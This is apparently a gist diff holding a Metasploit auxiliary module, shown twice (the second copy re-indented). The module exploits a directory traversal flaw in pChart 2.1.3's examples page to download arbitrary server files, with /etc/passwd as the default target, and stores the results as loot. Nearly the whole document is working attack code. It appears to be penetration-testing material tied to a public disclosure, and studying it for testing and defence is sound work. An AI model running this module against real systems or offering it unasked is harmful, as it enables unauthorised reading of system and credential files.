bcoles · August 25, 2014 11:23
diff --git a/pchart_example_page_traversal.rb b/pchart_example_page_traversal.rb
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'pChart Example Page Directory Traversal',
      'Description'    => %q{
          This module exploits a directory traversal bug in pChart version
        2.1.3 or earlier. The module can only be used to retrieve files.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sinn3r',  # This module is a rip off of sinn3r's yaws_traversal.rb
          'Balazs Makany', # Discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          ['EDB', '31173']
        ],
      'DisclosureDate' => 'Jan 24 2014'
    ))
    register_options(
      [
        OptInt.new('DEPTH', [true, 'The max traversal depth', 10]),
        OptString.new('TARGETURI', [true, 'The path to pChart library', '/pChart2.1.3/']),
        OptString.new('FILE',  [false, 'The name of the file to download', '/etc/passwd'])
      ], self.class)
    deregister_options('RHOST')
  end

  def run_host(ip)
    # No point to continue if no filename is specified
    if datastore['FILE'].nil? or datastore['FILE'].empty?
      print_error 'Please supply the name of the file you want to download'
      return
    end

    # Create request
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path,'/examples/index.php'),
      'vars_get' => Hash[{
        'Action' => 'View',
        'Script' => "#{'../' * datastore['DEPTH']}/#{datastore['FILE']}"
      }.to_a.shuffle]
    )

    # Show data if needed
    if res and res.code == 200
      vprint_line "#{res.body}"
      fname = File.basename datastore['FILE']
      path = store_loot(
        'pchart.http',
        'application/octet-stream',
        ip,
        res.body,
        fname
      )
      print_status "File saved in: #{path}"
      vprint_warning "Error retrieving file #{datastore['FILE']} from #{ip}" if res.body.length == 0
    else
      print_error "Nothing was downloaded"
    end
  end
 end
	##
	# This module requires Metasploit: http//metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Auxiliary

	include Msf::Auxiliary::Scanner
	include Msf::Auxiliary::Report
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
	super(update_info(
	info,
	'Name' => 'pChart Example Page Directory Traversal',
	'Description' => %q{
	This module exploits a directory traversal bug in pChart version
	2.1.3 or earlier. The module can only be used to retrieve files.
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	'sinn3r', # This module is a rip off of sinn3r's yaws_traversal.rb
	'Balazs Makany', # Discovery and PoC
	'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
	],
	'References' =>
	[
	['EDB', '31173']
	],
	'DisclosureDate' => 'Jan 24 2014'
	))
	register_options(
	[
	OptInt.new('DEPTH', [true, 'The max traversal depth', 10]),
	OptString.new('TARGETURI', [true, 'The path to pChart library', '/pChart2.1.3/']),
	OptString.new('FILE', [false, 'The name of the file to download', '/etc/passwd'])
	], self.class)
	deregister_options('RHOST')
	end

	def run_host(ip)
	# No point to continue if no filename is specified
	if datastore['FILE'].nil? or datastore['FILE'].empty?
	print_error 'Please supply the name of the file you want to download'
	return
	end

	# Create request
	res = send_request_cgi(
	'uri' => normalize_uri(target_uri.path,'/examples/index.php'),
	'vars_get' => Hash[{
	'Action' => 'View',
	'Script' => "#{'../' * datastore['DEPTH']}/#{datastore['FILE']}"
	}.to_a.shuffle]
	)

	# Show data if needed
	if res and res.code == 200
	vprint_line "#{res.body}"
	fname = File.basename datastore['FILE']
	path = store_loot(
	'pchart.http',
	'application/octet-stream',
	ip,
	res.body,
	fname
	)
	print_status "File saved in: #{path}"
	vprint_warning "Error retrieving file #{datastore['FILE']} from #{ip}" if res.body.length == 0
	else
	print_error "Nothing was downloaded"
	end
	end
	end